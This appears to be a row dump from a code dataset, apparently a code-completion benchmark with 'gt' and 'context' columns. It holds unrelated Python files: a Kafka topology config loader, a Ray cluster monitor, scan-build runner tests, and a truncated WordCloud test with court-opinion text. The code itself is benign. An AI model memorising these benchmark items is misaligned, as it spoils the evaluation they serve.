gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import glob
import logging
import os
from collections import namedtuple
import six
import yaml
from six.moves import map
from kafka_utils.util.error import ConfigurationError
from kafka_utils.util.error import InvalidConfigurationError
from kafka_utils.util.error import MissingConfigurationError
DEFAULT_KAFKA_TOPOLOGY_BASE_PATH = '/etc/kafka_discovery'
HOME_OVERRIDE = '.kafka_discovery'
class ClusterConfig(
namedtuple(
'ClusterConfig',
['type', 'name', 'broker_list', 'zookeeper'],
),
):
"""Cluster configuration.
:param name: cluster name
:param broker_list: list of kafka brokers
:param zookeeper: zookeeper connection string
"""
def __ne__(self, other):
return self.__hash__() != other.__hash__()
def __eq__(self, other):
return self.__hash__() == other.__hash__()
def __hash__(self):
if isinstance(self.broker_list, list):
broker_list = self.broker_list
else:
broker_list = self.broker_list.split(',')
zk_list = self.zookeeper.split(',')
return hash((
self.type,
self.name,
",".join(sorted([_f for _f in broker_list if _f])),
",".join(sorted([_f for _f in zk_list if _f]))
))
def load_yaml_config(config_path):
with open(config_path, 'r') as config_file:
return yaml.safe_load(config_file)
class TopologyConfiguration(object):
"""Topology configuration for a kafka cluster.
Read a cluster_type.yaml from the kafka_topology_path.
Example config file:
.. code-block:: yaml
clusters:
cluster1:
broker_list:
- "broker1:9092"
- "broker2:9092"
zookeeper: "zookeeper1:2181/mykafka"
cluster2:
broker_list:
- "broker3:9092"
- "broker4:9092"
zookeeper: "zookeeper2:2181/mykafka"
local_config:
cluster: cluster1
:param cluster_type: kafka cluster type.
:type cluster_type: string
:param kafka_topology_path: path of the directory containing
the kafka topology.yaml config
:type kafka_topology_path: string
"""
def __init__(
self,
cluster_type,
kafka_topology_path=DEFAULT_KAFKA_TOPOLOGY_BASE_PATH
):
self.kafka_topology_path = kafka_topology_path
self.cluster_type = cluster_type
self.log = logging.getLogger(self.__class__.__name__)
self.clusters = None
self.local_config = None
self.load_topology_config()
def __eq__(self, other):
if all([
self.cluster_type == other.cluster_type,
self.clusters == other.clusters,
self.local_config == other.local_config,
]):
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def load_topology_config(self):
"""Load the topology configuration"""
config_path = os.path.join(
self.kafka_topology_path,
'{id}.yaml'.format(id=self.cluster_type),
)
self.log.debug("Loading configuration from %s", config_path)
if os.path.isfile(config_path):
topology_config = load_yaml_config(config_path)
else:
raise MissingConfigurationError(
"Topology configuration {0} for cluster {1} "
"does not exist".format(
config_path,
self.cluster_type,
)
)
self.log.debug("Topology configuration %s", topology_config)
try:
self.clusters = topology_config['clusters']
except KeyError:
self.log.exception("Invalid topology file")
raise InvalidConfigurationError("Invalid topology file {0}".format(
config_path))
if 'local_config' in topology_config:
self.local_config = topology_config['local_config']
def get_all_clusters(self):
return [
ClusterConfig(
type=self.cluster_type,
name=name,
broker_list=cluster['broker_list'],
zookeeper=cluster['zookeeper'],
)
for name, cluster in six.iteritems(self.clusters)
]
def get_cluster_by_name(self, name):
if name in self.clusters:
cluster = self.clusters[name]
return ClusterConfig(
type=self.cluster_type,
name=name,
broker_list=cluster['broker_list'],
zookeeper=cluster['zookeeper'],
)
raise ConfigurationError("No cluster with name: {0}".format(name))
def get_local_cluster(self):
if self.local_config:
try:
local_cluster = self.clusters[self.local_config['cluster']]
return ClusterConfig(
type=self.cluster_type,
name=self.local_config['cluster'],
broker_list=local_cluster['broker_list'],
zookeeper=local_cluster['zookeeper'])
except KeyError:
self.log.exception("Invalid topology file")
raise InvalidConfigurationError("Invalid topology file")
else:
raise ConfigurationError("No default local cluster configured")
def __repr__(self):
return ("TopologyConfig: cluster_type {0}, clusters: {1},"
"local_config {2}".format(
self.cluster_type,
self.clusters,
self.local_config
))
def get_conf_dirs():
config_dirs = []
if os.environ.get("KAFKA_DISCOVERY_DIR"):
config_dirs.append(os.environ["KAFKA_DISCOVERY_DIR"])
if os.environ.get("HOME"):
home_config = os.path.join(
os.path.abspath(os.environ['HOME']),
HOME_OVERRIDE,
)
if os.path.isdir(home_config):
config_dirs.append(home_config)
config_dirs.append(DEFAULT_KAFKA_TOPOLOGY_BASE_PATH)
return config_dirs
def get_cluster_config(
cluster_type,
cluster_name=None,
kafka_topology_base_path=None,
):
"""Return the cluster configuration.
Use the local cluster if cluster_name is not specified.
:param cluster_type: the type of the cluster
:type cluster_type: string
:param cluster_name: the name of the cluster
:type cluster_name: string
:param kafka_topology_base_path: base path to look for <cluster_type>.yaml
:type cluster_name: string
:returns: the cluster
:rtype: ClusterConfig
"""
if not kafka_topology_base_path:
config_dirs = get_conf_dirs()
else:
config_dirs = [kafka_topology_base_path]
topology = None
for config_dir in config_dirs:
try:
topology = TopologyConfiguration(
cluster_type,
config_dir,
)
except MissingConfigurationError:
pass
if not topology:
raise MissingConfigurationError(
"No available configuration for type {0}".format(cluster_type),
)
if cluster_name:
return topology.get_cluster_by_name(cluster_name)
else:
return topology.get_local_cluster()
def iter_configurations(kafka_topology_base_path=None):
"""Cluster topology iterator.
Iterate over all the topologies available in config.
"""
if not kafka_topology_base_path:
config_dirs = get_conf_dirs()
else:
config_dirs = [kafka_topology_base_path]
types = set()
for config_dir in config_dirs:
new_types = [x for x in map(
lambda x: os.path.basename(x)[:-5],
glob.glob('{0}/*.yaml'.format(config_dir)),
) if x not in types]
for cluster_type in new_types:
try:
topology = TopologyConfiguration(
cluster_type,
config_dir,
)
except ConfigurationError:
continue
types.add(cluster_type)
yield topology
| |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import Counter
import json
import logging
import redis
import time
import ray
from ray.services import get_ip_address, get_port
import ray.utils
from ray.utils import binary_to_object_id, binary_to_hex, hex_to_binary
# Import flatbuffer bindings.
from ray.core.generated.SubscribeToDBClientTableReply \
import SubscribeToDBClientTableReply
from ray.core.generated.DriverTableMessage import DriverTableMessage
# These variables must be kept in sync with the C codebase.
# common/common.h
HEARTBEAT_TIMEOUT_MILLISECONDS = 100
NUM_HEARTBEATS_TIMEOUT = 100
DB_CLIENT_ID_SIZE = 20
NIL_ID = b"\xff" * DB_CLIENT_ID_SIZE
# common/task.h
TASK_STATUS_LOST = 32
# common/state/redis.cc
PLASMA_MANAGER_HEARTBEAT_CHANNEL = b"plasma_managers"
DRIVER_DEATH_CHANNEL = b"driver_deaths"
# common/redis_module/ray_redis_module.cc
OBJECT_PREFIX = "OL:"
DB_CLIENT_PREFIX = "CL:"
DB_CLIENT_TABLE_NAME = b"db_clients"
# local_scheduler/local_scheduler.h
LOCAL_SCHEDULER_CLIENT_TYPE = b"local_scheduler"
# plasma/plasma_manager.cc
PLASMA_MANAGER_CLIENT_TYPE = b"plasma_manager"
# Set up logging.
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
class Monitor(object):
"""A monitor for Ray processes.
The monitor is in charge of cleaning up the tables in the global state
after processes have died. The monitor is currently not responsible for
detecting component failures.
Attributes:
redis: A connection to the Redis server.
subscribe_client: A pubsub client for the Redis server. This is used to
receive notifications about failed components.
subscribed: A dictionary mapping channel names (str) to whether or not
the subscription to that channel has succeeded yet (bool).
dead_local_schedulers: A set of the local scheduler IDs of all of the
local schedulers that were up at one point and have died since
then.
live_plasma_managers: A counter mapping live plasma manager IDs to the
number of heartbeats that have passed since we last heard from that
plasma manager. A plasma manager is live if we received a heartbeat
from it at any point, and if it has not timed out.
dead_plasma_managers: A set of the plasma manager IDs of all the plasma
managers that were up at one point and have died since then.
"""
def __init__(self, redis_address, redis_port):
# Initialize the Redis clients.
self.state = ray.experimental.state.GlobalState()
self.state._initialize_global_state(redis_address, redis_port)
self.redis = redis.StrictRedis(host=redis_address, port=redis_port,
db=0)
# TODO(swang): Update pubsub client to use ray.experimental.state once
# subscriptions are implemented there.
self.subscribe_client = self.redis.pubsub()
self.subscribed = {}
# Initialize data structures to keep track of the active database
# clients.
self.dead_local_schedulers = set()
self.live_plasma_managers = Counter()
self.dead_plasma_managers = set()
def subscribe(self, channel):
"""Subscribe to the given channel.
Args:
channel (str): The channel to subscribe to.
Raises:
Exception: An exception is raised if the subscription fails.
"""
self.subscribe_client.subscribe(channel)
self.subscribed[channel] = False
def cleanup_actors(self):
"""Recreate any live actors whose corresponding local scheduler died.
For any live actor whose local scheduler just died, we choose a new
local scheduler and broadcast a notification to create that actor.
"""
actor_info = self.state.actors()
for actor_id, info in actor_info.items():
if (not info["removed"] and
info["local_scheduler_id"] in self.dead_local_schedulers):
# Choose a new local scheduler to run the actor.
local_scheduler_id = ray.utils.select_local_scheduler(
info["driver_id"], self.state.local_schedulers(),
info["num_gpus"], self.redis)
import sys
sys.stdout.flush()
# The new local scheduler should not be the same as the old
# local scheduler. TODO(rkn): This should not be an assert, it
# should be something more benign.
assert (binary_to_hex(local_scheduler_id) !=
info["local_scheduler_id"])
# Announce to all of the local schedulers that the actor should
# be recreated on this new local scheduler.
ray.utils.publish_actor_creation(
hex_to_binary(actor_id), hex_to_binary(info["driver_id"]),
local_scheduler_id, True, self.redis)
log.info("Actor {} for driver {} was on dead local scheduler "
"{}. It is being recreated on local scheduler {}"
.format(actor_id, info["driver_id"],
info["local_scheduler_id"],
binary_to_hex(local_scheduler_id)))
# Update the actor info in Redis.
self.redis.hset(b"Actor:" + hex_to_binary(actor_id),
"local_scheduler_id", local_scheduler_id)
def cleanup_task_table(self):
"""Clean up global state for failed local schedulers.
This marks any tasks that were scheduled on dead local schedulers as
TASK_STATUS_LOST. A local scheduler is deemed dead if it is in
self.dead_local_schedulers.
"""
tasks = self.state.task_table()
num_tasks_updated = 0
for task_id, task in tasks.items():
# See if the corresponding local scheduler is alive.
if task["LocalSchedulerID"] in self.dead_local_schedulers:
# If the task is scheduled on a dead local scheduler, mark the
# task as lost.
key = binary_to_object_id(hex_to_binary(task_id))
ok = self.state._execute_command(
key, "RAY.TASK_TABLE_UPDATE", hex_to_binary(task_id),
ray.experimental.state.TASK_STATUS_LOST, NIL_ID)
if ok != b"OK":
log.warn("Failed to update lost task for dead scheduler.")
num_tasks_updated += 1
if num_tasks_updated > 0:
log.warn("Marked {} tasks as lost.".format(num_tasks_updated))
def cleanup_object_table(self):
"""Clean up global state for failed plasma managers.
This removes dead plasma managers from any location entries in the
object table. A plasma manager is deemed dead if it is in
self.dead_plasma_managers.
"""
# TODO(swang): Also kill the associated plasma store, since it's no
# longer reachable without a plasma manager.
objects = self.state.object_table()
num_objects_removed = 0
for object_id, obj in objects.items():
manager_ids = obj["ManagerIDs"]
if manager_ids is None:
continue
for manager in manager_ids:
if manager in self.dead_plasma_managers:
# If the object was on a dead plasma manager, remove that
# location entry.
ok = self.state._execute_command(object_id,
"RAY.OBJECT_TABLE_REMOVE",
object_id.id(),
hex_to_binary(manager))
if ok != b"OK":
log.warn("Failed to remove object location for dead "
"plasma manager.")
num_objects_removed += 1
if num_objects_removed > 0:
log.warn("Marked {} objects as lost.".format(num_objects_removed))
def scan_db_client_table(self):
"""Scan the database client table for dead clients.
After subscribing to the client table, it's necessary to call this
before reading any messages from the subscription channel. This ensures
that we do not miss any notifications for deleted clients that occurred
before we subscribed.
"""
clients = self.state.client_table()
for node_ip_address, node_clients in clients.items():
for client in node_clients:
db_client_id = client["DBClientID"]
client_type = client["ClientType"]
if client["Deleted"]:
if client_type == LOCAL_SCHEDULER_CLIENT_TYPE:
self.dead_local_schedulers.add(db_client_id)
elif client_type == PLASMA_MANAGER_CLIENT_TYPE:
self.dead_plasma_managers.add(db_client_id)
def subscribe_handler(self, channel, data):
"""Handle a subscription success message from Redis."""
log.debug("Subscribed to {}, data was {}".format(channel, data))
self.subscribed[channel] = True
def db_client_notification_handler(self, channel, data):
"""Handle a notification from the db_client table from Redis.
This handler processes notifications from the db_client table.
Notifications should be parsed using the SubscribeToDBClientTableReply
flatbuffer. Deletions are processed, insertions are ignored. Cleanup of
the associated state in the state tables should be handled by the
caller.
"""
notification_object = (SubscribeToDBClientTableReply
.GetRootAsSubscribeToDBClientTableReply(data,
0))
db_client_id = binary_to_hex(notification_object.DbClientId())
client_type = notification_object.ClientType()
is_insertion = notification_object.IsInsertion()
# If the update was an insertion, we ignore it.
if is_insertion:
return
# If the update was a deletion, add them to our accounting for dead
# local schedulers and plasma managers.
log.warn("Removed {}, client ID {}".format(client_type, db_client_id))
if client_type == LOCAL_SCHEDULER_CLIENT_TYPE:
if db_client_id not in self.dead_local_schedulers:
self.dead_local_schedulers.add(db_client_id)
elif client_type == PLASMA_MANAGER_CLIENT_TYPE:
if db_client_id not in self.dead_plasma_managers:
self.dead_plasma_managers.add(db_client_id)
# Stop tracking this plasma manager's heartbeats, since it's
# already dead.
del self.live_plasma_managers[db_client_id]
def plasma_manager_heartbeat_handler(self, channel, data):
"""Handle a plasma manager heartbeat from Redis.
This resets the number of heartbeats that we've missed from this plasma
manager.
"""
# The first DB_CLIENT_ID_SIZE characters are the client ID.
db_client_id = data[:DB_CLIENT_ID_SIZE]
# Reset the number of heartbeats that we've missed from this plasma
# manager.
self.live_plasma_managers[db_client_id] = 0
def driver_removed_handler(self, channel, data):
"""Handle a notification that a driver has been removed.
This releases any GPU resources that were reserved for that driver in
Redis.
"""
message = DriverTableMessage.GetRootAsDriverTableMessage(data, 0)
driver_id = message.DriverId()
log.info("Driver {} has been removed."
.format(binary_to_hex(driver_id)))
# Get a list of the local schedulers.
client_table = ray.global_state.client_table()
local_schedulers = []
for ip_address, clients in client_table.items():
for client in clients:
if client["ClientType"] == "local_scheduler":
local_schedulers.append(client)
# Release any GPU resources that have been reserved for this driver in
# Redis.
for local_scheduler in local_schedulers:
if int(local_scheduler["NumGPUs"]) > 0:
local_scheduler_id = local_scheduler["DBClientID"]
num_gpus_returned = 0
# Perform a transaction to return the GPUs.
with self.redis.pipeline() as pipe:
while True:
try:
# If this key is changed before the transaction
# below (the multi/exec block), then the
# transaction will not take place.
pipe.watch(local_scheduler_id)
result = pipe.hget(local_scheduler_id,
"gpus_in_use")
gpus_in_use = (dict() if result is None
else json.loads(result))
driver_id_hex = binary_to_hex(driver_id)
if driver_id_hex in gpus_in_use:
num_gpus_returned = gpus_in_use.pop(
driver_id_hex)
pipe.multi()
pipe.hset(local_scheduler_id, "gpus_in_use",
json.dumps(gpus_in_use))
pipe.execute()
# If a WatchError is not raise, then the operations
# should have gone through atomically.
break
except redis.WatchError:
# Another client must have changed the watched key
# between the time we started WATCHing it and the
# pipeline's execution. We should just retry.
continue
log.info("Driver {} is returning GPU IDs {} to local "
"scheduler {}.".format(binary_to_hex(driver_id),
num_gpus_returned,
local_scheduler_id))
def process_messages(self):
"""Process all messages ready in the subscription channels.
This reads messages from the subscription channels and calls the
appropriate handlers until there are no messages left.
"""
while True:
message = self.subscribe_client.get_message()
if message is None:
return
# Parse the message.
channel = message["channel"]
data = message["data"]
# Determine the appropriate message handler.
message_handler = None
if not self.subscribed[channel]:
# If the data was an integer, then the message was a response
# to an initial subscription request.
message_handler = self.subscribe_handler
elif channel == PLASMA_MANAGER_HEARTBEAT_CHANNEL:
assert(self.subscribed[channel])
# The message was a heartbeat from a plasma manager.
message_handler = self.plasma_manager_heartbeat_handler
elif channel == DB_CLIENT_TABLE_NAME:
assert(self.subscribed[channel])
# The message was a notification from the db_client table.
message_handler = self.db_client_notification_handler
elif channel == DRIVER_DEATH_CHANNEL:
assert(self.subscribed[channel])
# The message was a notification that a driver was removed.
message_handler = self.driver_removed_handler
else:
raise Exception("This code should be unreachable.")
# Call the handler.
assert(message_handler is not None)
message_handler(channel, data)
def run(self):
"""Run the monitor.
This function loops forever, checking for messages about dead database
clients and cleaning up state accordingly.
"""
# Initialize the subscription channel.
self.subscribe(DB_CLIENT_TABLE_NAME)
self.subscribe(PLASMA_MANAGER_HEARTBEAT_CHANNEL)
self.subscribe(DRIVER_DEATH_CHANNEL)
# Scan the database table for dead database clients. NOTE: This must be
# called before reading any messages from the subscription channel.
# This ensures that we start in a consistent state, since we may have
# missed notifications that were sent before we connected to the
# subscription channel.
self.scan_db_client_table()
# If there were any dead clients at startup, clean up the associated
# state in the state tables.
if len(self.dead_local_schedulers) > 0:
self.cleanup_task_table()
self.cleanup_actors()
if len(self.dead_plasma_managers) > 0:
self.cleanup_object_table()
log.debug("{} dead local schedulers, {} plasma managers total, {} "
"dead plasma managers".format(
len(self.dead_local_schedulers),
(len(self.live_plasma_managers) +
len(self.dead_plasma_managers)),
len(self.dead_plasma_managers)))
# Handle messages from the subscription channels.
while True:
# Record how many dead local schedulers and plasma managers we had
# at the beginning of this round.
num_dead_local_schedulers = len(self.dead_local_schedulers)
num_dead_plasma_managers = len(self.dead_plasma_managers)
# Process a round of messages.
self.process_messages()
# If any new local schedulers or plasma managers were marked as
# dead in this round, clean up the associated state.
if len(self.dead_local_schedulers) > num_dead_local_schedulers:
self.cleanup_task_table()
self.cleanup_actors()
if len(self.dead_plasma_managers) > num_dead_plasma_managers:
self.cleanup_object_table()
# Handle plasma managers that timed out during this round.
plasma_manager_ids = list(self.live_plasma_managers.keys())
for plasma_manager_id in plasma_manager_ids:
if ((self.live_plasma_managers
[plasma_manager_id]) >= NUM_HEARTBEATS_TIMEOUT):
log.warn("Timed out {}".format(PLASMA_MANAGER_CLIENT_TYPE))
# Remove the plasma manager from the managers whose
# heartbeats we're tracking.
del self.live_plasma_managers[plasma_manager_id]
# Remove the plasma manager from the db_client table. The
# corresponding state in the object table will be cleaned
# up once we receive the notification for this db_client
# deletion.
self.redis.execute_command("RAY.DISCONNECT",
plasma_manager_id)
# Increment the number of heartbeats that we've missed from each
# plasma manager.
for plasma_manager_id in self.live_plasma_managers:
self.live_plasma_managers[plasma_manager_id] += 1
# Wait for a heartbeat interval before processing the next round of
# messages.
time.sleep(HEARTBEAT_TIMEOUT_MILLISECONDS * 1e-3)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=("Parse Redis server for the "
"monitor to connect to."))
parser.add_argument("--redis-address", required=True, type=str,
help="the address to use for Redis")
args = parser.parse_args()
redis_ip_address = get_ip_address(args.redis_address)
redis_port = get_port(args.redis_address)
# Initialize the global state.
ray.global_state._initialize_global_state(redis_ip_address, redis_port)
monitor = Monitor(redis_ip_address, redis_port)
monitor.run()
| |
# -*- coding: utf-8 -*-
# The LLVM Compiler Infrastructure
#
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
import libear
import libscanbuild.runner as sut
import unittest
import re
import os
import os.path
class FilteringFlagsTest(unittest.TestCase):
def test_language_captured(self):
def test(flags):
cmd = ['clang', '-c', 'source.c'] + flags
opts = sut.classify_parameters(cmd)
return opts['language']
self.assertEqual(None, test([]))
self.assertEqual('c', test(['-x', 'c']))
self.assertEqual('cpp', test(['-x', 'cpp']))
def test_arch(self):
def test(flags):
cmd = ['clang', '-c', 'source.c'] + flags
opts = sut.classify_parameters(cmd)
return opts['arch_list']
self.assertEqual([], test([]))
self.assertEqual(['mips'], test(['-arch', 'mips']))
self.assertEqual(['mips', 'i386'],
test(['-arch', 'mips', '-arch', 'i386']))
def assertFlagsChanged(self, expected, flags):
cmd = ['clang', '-c', 'source.c'] + flags
opts = sut.classify_parameters(cmd)
self.assertEqual(expected, opts['flags'])
def assertFlagsUnchanged(self, flags):
self.assertFlagsChanged(flags, flags)
def assertFlagsFiltered(self, flags):
self.assertFlagsChanged([], flags)
def test_optimalizations_pass(self):
self.assertFlagsUnchanged(['-O'])
self.assertFlagsUnchanged(['-O1'])
self.assertFlagsUnchanged(['-Os'])
self.assertFlagsUnchanged(['-O2'])
self.assertFlagsUnchanged(['-O3'])
def test_include_pass(self):
self.assertFlagsUnchanged([])
self.assertFlagsUnchanged(['-include', '/usr/local/include'])
self.assertFlagsUnchanged(['-I.'])
self.assertFlagsUnchanged(['-I', '.'])
self.assertFlagsUnchanged(['-I/usr/local/include'])
self.assertFlagsUnchanged(['-I', '/usr/local/include'])
self.assertFlagsUnchanged(['-I/opt', '-I', '/opt/otp/include'])
self.assertFlagsUnchanged(['-isystem', '/path'])
self.assertFlagsUnchanged(['-isystem=/path'])
def test_define_pass(self):
self.assertFlagsUnchanged(['-DNDEBUG'])
self.assertFlagsUnchanged(['-UNDEBUG'])
self.assertFlagsUnchanged(['-Dvar1=val1', '-Dvar2=val2'])
self.assertFlagsUnchanged(['-Dvar="val ues"'])
def test_output_filtered(self):
self.assertFlagsFiltered(['-o', 'source.o'])
def test_some_warning_filtered(self):
self.assertFlagsFiltered(['-Wall'])
self.assertFlagsFiltered(['-Wnoexcept'])
self.assertFlagsFiltered(['-Wreorder', '-Wunused', '-Wundef'])
self.assertFlagsUnchanged(['-Wno-reorder', '-Wno-unused'])
def test_compile_only_flags_pass(self):
self.assertFlagsUnchanged(['-std=C99'])
self.assertFlagsUnchanged(['-nostdinc'])
self.assertFlagsUnchanged(['-isystem', '/image/debian'])
self.assertFlagsUnchanged(['-iprefix', '/usr/local'])
self.assertFlagsUnchanged(['-iquote=me'])
self.assertFlagsUnchanged(['-iquote', 'me'])
def test_compile_and_link_flags_pass(self):
self.assertFlagsUnchanged(['-fsinged-char'])
self.assertFlagsUnchanged(['-fPIC'])
self.assertFlagsUnchanged(['-stdlib=libc++'])
self.assertFlagsUnchanged(['--sysroot', '/'])
self.assertFlagsUnchanged(['-isysroot', '/'])
def test_some_flags_filtered(self):
self.assertFlagsFiltered(['-g'])
self.assertFlagsFiltered(['-fsyntax-only'])
self.assertFlagsFiltered(['-save-temps'])
self.assertFlagsFiltered(['-init', 'my_init'])
self.assertFlagsFiltered(['-sectorder', 'a', 'b', 'c'])
class Spy(object):
def __init__(self):
self.arg = None
self.success = 0
def call(self, params):
self.arg = params
return self.success
class RunAnalyzerTest(unittest.TestCase):
@staticmethod
def run_analyzer(content, failures_report):
with libear.TemporaryDirectory() as tmpdir:
filename = os.path.join(tmpdir, 'test.cpp')
with open(filename, 'w') as handle:
handle.write(content)
opts = {
'clang': 'clang',
'directory': os.getcwd(),
'flags': [],
'direct_args': [],
'file': filename,
'output_dir': tmpdir,
'output_format': 'plist',
'output_failures': failures_report
}
spy = Spy()
result = sut.run_analyzer(opts, spy.call)
return (result, spy.arg)
def test_run_analyzer(self):
content = "int div(int n, int d) { return n / d; }"
(result, fwds) = RunAnalyzerTest.run_analyzer(content, False)
self.assertEqual(None, fwds)
self.assertEqual(0, result['exit_code'])
def test_run_analyzer_crash(self):
content = "int div(int n, int d) { return n / d }"
(result, fwds) = RunAnalyzerTest.run_analyzer(content, False)
self.assertEqual(None, fwds)
self.assertEqual(1, result['exit_code'])
def test_run_analyzer_crash_and_forwarded(self):
content = "int div(int n, int d) { return n / d }"
(_, fwds) = RunAnalyzerTest.run_analyzer(content, True)
self.assertEqual('crash', fwds['error_type'])
self.assertEqual(1, fwds['exit_code'])
self.assertTrue(len(fwds['error_output']) > 0)
class ReportFailureTest(unittest.TestCase):
def assertUnderFailures(self, path):
self.assertEqual('failures', os.path.basename(os.path.dirname(path)))
def test_report_failure_create_files(self):
with libear.TemporaryDirectory() as tmpdir:
# create input file
filename = os.path.join(tmpdir, 'test.c')
with open(filename, 'w') as handle:
handle.write('int main() { return 0')
uname_msg = ' '.join(os.uname()) + os.linesep
error_msg = 'this is my error output'
# execute test
opts = {
'clang': 'clang',
'directory': os.getcwd(),
'flags': [],
'file': filename,
'output_dir': tmpdir,
'language': 'c',
'error_type': 'other_error',
'error_output': error_msg,
'exit_code': 13
}
sut.report_failure(opts)
# verify the result
result = dict()
pp_file = None
for root, _, files in os.walk(tmpdir):
keys = [os.path.join(root, name) for name in files]
for key in keys:
with open(key, 'r') as handle:
result[key] = handle.readlines()
if re.match(r'^(.*/)+clang(.*)\.i$', key):
pp_file = key
# prepocessor file generated
self.assertUnderFailures(pp_file)
# info file generated and content dumped
info_file = pp_file + '.info.txt'
self.assertTrue(info_file in result)
self.assertEqual('Other Error\n', result[info_file][1])
self.assertEqual(uname_msg, result[info_file][3])
# error file generated and content dumped
error_file = pp_file + '.stderr.txt'
self.assertTrue(error_file in result)
self.assertEqual([error_msg], result[error_file])
class AnalyzerTest(unittest.TestCase):
def test_nodebug_macros_appended(self):
def test(flags):
spy = Spy()
opts = {'flags': flags, 'force_debug': True}
self.assertEqual(spy.success,
sut.filter_debug_flags(opts, spy.call))
return spy.arg['flags']
self.assertEqual(['-UNDEBUG'], test([]))
self.assertEqual(['-DNDEBUG', '-UNDEBUG'], test(['-DNDEBUG']))
self.assertEqual(['-DSomething', '-UNDEBUG'], test(['-DSomething']))
def test_set_file_relative_path(self):
def test(expected, input):
spy = Spy()
self.assertEqual(spy.success,
sut.set_file_path_relative(input, spy.call))
self.assertEqual(expected, spy.arg['file'])
test('source.c',
{'file': '/home/me/source.c', 'directory': '/home/me'})
test('me/source.c',
{'file': '/home/me/source.c', 'directory': '/home'})
test('../home/me/source.c',
{'file': '/home/me/source.c', 'directory': '/tmp'})
def test_set_language_fall_through(self):
def language(expected, input):
spy = Spy()
input.update({'compiler': 'c', 'file': 'test.c'})
self.assertEqual(spy.success, sut.language_check(input, spy.call))
self.assertEqual(expected, spy.arg['language'])
language('c', {'language': 'c', 'flags': []})
language('c++', {'language': 'c++', 'flags': []})
def test_set_language_stops_on_not_supported(self):
spy = Spy()
input = {
'compiler': 'c',
'flags': [],
'file': 'test.java',
'language': 'java'
}
self.assertIsNone(sut.language_check(input, spy.call))
self.assertIsNone(spy.arg)
def test_set_language_sets_flags(self):
def flags(expected, input):
spy = Spy()
input.update({'compiler': 'c', 'file': 'test.c'})
self.assertEqual(spy.success, sut.language_check(input, spy.call))
self.assertEqual(expected, spy.arg['flags'])
flags(['-x', 'c'], {'language': 'c', 'flags': []})
flags(['-x', 'c++'], {'language': 'c++', 'flags': []})
def test_set_language_from_filename(self):
def language(expected, input):
spy = Spy()
input.update({'language': None, 'flags': []})
self.assertEqual(spy.success, sut.language_check(input, spy.call))
self.assertEqual(expected, spy.arg['language'])
language('c', {'file': 'file.c', 'compiler': 'c'})
language('c++', {'file': 'file.c', 'compiler': 'c++'})
language('c++', {'file': 'file.cxx', 'compiler': 'c'})
language('c++', {'file': 'file.cxx', 'compiler': 'c++'})
language('c++', {'file': 'file.cpp', 'compiler': 'c++'})
language('c-cpp-output', {'file': 'file.i', 'compiler': 'c'})
language('c++-cpp-output', {'file': 'file.i', 'compiler': 'c++'})
def test_arch_loop_sets_flags(self):
def flags(archs):
spy = Spy()
input = {'flags': [], 'arch_list': archs}
sut.arch_check(input, spy.call)
return spy.arg['flags']
self.assertEqual([], flags([]))
self.assertEqual(['-arch', 'i386'], flags(['i386']))
self.assertEqual(['-arch', 'i386'], flags(['i386', 'ppc']))
self.assertEqual(['-arch', 'sparc'], flags(['i386', 'sparc']))
def test_arch_loop_stops_on_not_supported(self):
def stop(archs):
spy = Spy()
input = {'flags': [], 'arch_list': archs}
self.assertIsNone(sut.arch_check(input, spy.call))
self.assertIsNone(spy.arg)
stop(['ppc'])
stop(['ppc64'])
@sut.require([])
def method_without_expecteds(opts):
return 0
@sut.require(['this', 'that'])
def method_with_expecteds(opts):
return 0
@sut.require([])
def method_exception_from_inside(opts):
raise Exception('here is one')
class RequireDecoratorTest(unittest.TestCase):
def test_method_without_expecteds(self):
self.assertEqual(method_without_expecteds(dict()), 0)
self.assertEqual(method_without_expecteds({}), 0)
self.assertEqual(method_without_expecteds({'this': 2}), 0)
self.assertEqual(method_without_expecteds({'that': 3}), 0)
def test_method_with_expecteds(self):
self.assertRaises(KeyError, method_with_expecteds, dict())
self.assertRaises(KeyError, method_with_expecteds, {})
self.assertRaises(KeyError, method_with_expecteds, {'this': 2})
self.assertRaises(KeyError, method_with_expecteds, {'that': 3})
self.assertEqual(method_with_expecteds({'this': 0, 'that': 3}), 0)
def test_method_exception_not_caught(self):
self.assertRaises(Exception, method_exception_from_inside, dict())
| |
'''
Test Cases for DocumentSorter Class for WordCloud Project
Daniel Klein
Computer-Based Honors Program
The University of Alabama
9.27.2013
'''
import unittest
import os, os.path
from src.core.python.SupremeCourtOpinion import SupremeCourtOpinion
from src.core.python.SupremeCourtOpinionMetadata import SupremeCourtOpinionMetadata
from src.core.python.DocumentSorter import DocumentSorter
##### Here are all the global variables used in these tests.
VALID_OPINION_FILE_LINES = ([
"""\
TITLE: UNITED STATES v. JOHNSON ET AL., DOING BUSINESS AS UNITED STATES\
DENTAL CO., ET AL.\
""",
"""CASE NUMBER: No. 43""",
"""US CITATION: 323 U.S. 273""",
"""SUPREME COURT CITATION: 65 S. Ct. 249""",
"""LAWYERS ED CITATION: 89 L. Ed. 236""",
"""LEXIS CITATION: 1944 U.S. LEXIS 1230""",
"""\
FULL CITATION: 323 U.S. 273; 65 S. Ct. 249; 89 L. Ed. 236; 1944 U.S. LEXIS 1230\
""",
"""DATES: November 8, 1944, Argued;December 18, 1944, Decided;""",
"""DISPOSITION: 53 F.Supp. 596, affirmed.""",
"""* * * * * * * *""",
"""MR. JUSTICE MURPHY, concurring.""",
"""I join in the opinion of the Court and believe that the judgment should be \
affirmed.""",
"""Congress has the constitutional power to fix venue at any place where a \
crime occurs. Our problem here is to determine, in the absence of a specific \
venue provision, where the crime outlawed by the Federal Denture Act occurred \
for purposes of venue.""",
"""The Act prohibits the use of the mails for the purpose of sending or \
bringing into any state certain prohibited articles. It is undisputed that \
when a defendant places a prohibited article in the mails in Illinois for \
